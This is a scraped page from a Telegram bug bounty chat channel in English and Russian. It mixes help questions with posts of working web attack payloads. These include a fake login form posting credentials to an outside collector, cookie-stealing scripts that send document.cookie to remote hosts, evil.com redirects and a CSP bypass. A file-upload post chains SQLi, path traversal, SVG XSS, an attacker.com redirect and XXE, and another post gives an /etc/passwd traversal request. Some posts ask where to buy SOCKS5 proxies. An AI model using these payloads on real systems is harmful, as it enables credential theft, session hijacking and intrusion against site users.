bugbountygroup | Unsorted

Telegram-канал bugbountygroup - Bug bounty chat

3186

Talk and help about bugbounty

Subscribe to a channel

Bug bounty chat

On my target.
I logout then intercept with Burpsuite then send to repeater and dropped the proxy.
I clear all the cookies in the request form then I generated PoC. I click on the PoC HTML file then it load then I got logout from my account.

Csrf vulnerability?

Читать полностью…

Bug bounty chat

<A HREF="http://evil.com/">Login Here </A>

<script>document.location.href="http://evil.com"</script>

<h3>Please login to proceed</h3> <form action=http://abp16yqa8m56p2kznk76xvmnqew5kwakz.oastify.com>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br>

csp bypass:
<script>alert(1)</script>&token=;script-src-elem 'unsafe-inline'

iframe:
"><iframe src="https://nasa.gov" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">

<IFRAME SRC="javascript:alert(document.cookie);"></iframe>

cookie stealer:
<script>document.location='http://sb7j6gqs845opkkhn27oxdm5qwwnks8h.oastify.com?c='+document.cookie&lt;/script&gt;

<script>new Image().src="http://localhost/cookie.php?c="+document.cookie</script>

<script>document.body.background=”https://www.jhadol.com/images/photos/original/1465212129eukl.jpg“;</script>

<script>window.location=”https://coffinxp.000webhostapp.com/coffinxp1.html”;</script>

<script>document.body.bgColor=”red”;</script>

Читать полностью…

Bug bounty chat

# Google Dork: "index of" "user.MYD" # Title: Disclosure of sensitive files. # Date: 15/08/2020 # Author: Sahil Saxena # LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174 # Twitter: https://twitter.com/Sahil_delinitor # GitHub: https://github.com/Sahil-69 # Bugcrowd: https://bugcrowd.com/Prickn Thanks, Sahil Saxena

Читать полностью…

Bug bounty chat

what exectly u need to scrap?

Читать полностью…

Bug bounty chat

scrapiing do like a grep? with curl?!

Читать полностью…

Bug bounty chat

do you know any website where i can get it

Читать полностью…

Bug bounty chat

а нафига они тебе? есть сайты с подпиской на пачки socks.. либо намути сам теми же сплоентами )

Читать полностью…

Bug bounty chat

Hello everyone, this is a new information gathering bot, where you get all the information via email, phone number, username and more. Please do check and give a feedback


@Cipherinfo_bot

Читать полностью…

Bug bounty chat

Sign of attack in APK

Читать полностью…

Bug bounty chat

Nginx is blocking %00
Any bypass?

Читать полностью…

Bug bounty chat

If there are any resources or material one could use please do share

Читать полностью…

Bug bounty chat

Thanks but the genymotion I'm seeing is a paid version and the free is hard to setup on my pc

Читать полностью…

Bug bounty chat

any apple product security researchers

Читать полностью…

Bug bounty chat

Hello please Does anyone know who to proxy a mobile by it's wifi hotspot through burpsuite

Читать полностью…

Bug bounty chat

Anybody here know about nuclei headless template

Читать полностью…

Bug bounty chat

Has anyone ever heard of rudder encryption or seen it a request form

Читать полностью…

Bug bounty chat

How to find local file read vulnerabilities based on cookies.

Request
GET /vulnerable.php HTTP/1.1
Cookie:usid=../../../../../../../../../../../../../etc/pasdwd

Response
HTTP/1.1 200 OK
...
Server: Apache root:fi3sER6:0:1:System Operator:/:/bin/ksh//

#bugbounty #bugbountytip

Читать полностью…

Bug bounty chat

👋 Hello,
While checking my target. I saw a url ending with config-apim.json.
It contains a client Id, clientlibrary and login.window.net.

What do you think?

Читать полностью…

Bug bounty chat

On burps or terminal .. so it's gonna grep all the page?

Читать полностью…

Bug bounty chat

Can I scrape any website using burps??

Читать полностью…

Bug bounty chat

под блеч, или под антиблокировки, или под брут?

Читать полностью…

Bug bounty chat

Please hackers
Where can I buy good Socks5

Читать полностью…

Bug bounty chat

https://medium.com/bugbountywriteup/my-hunt-discovering-microsoft-bugs-f6a9c790bec0

Читать полностью…

Bug bounty chat

https://youtu.be/7IAGUD7By0c?si=kOHtzQ_OiYfP6hbc

Читать полностью…

Bug bounty chat

When downloading you have to select the option that says personal use
Genymotion is free

Читать полностью…

Bug bounty chat

However though I don't know much about this Frida or how to use it

Читать полностью…

Bug bounty chat

I faced thesame thing sometime ago
So I just used genymotion emulator and frida

Читать полностью…

Bug bounty chat

Let me explain it in more details I'm trying to proxy my phone through burpsuite and I can't cause I don't have a wifi Instead I'm using my phone's WiFi hotspot

Читать полностью…

Bug bounty chat

Ever you create any headless template for you

Читать полностью…

Bug bounty chat

🖥Chaining Vulnerabilities through File Upload🖥

SLQi⏳

'sleep(20).jpg
sleep(25)-- -.jpg


Path traversal⏳
../../etc/passwd/logo.png
../../../logo.png


XSS⏳
->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>


Open redirect ⏳
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>

XXE ⏳
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>

Читать полностью…
Subscribe to a channel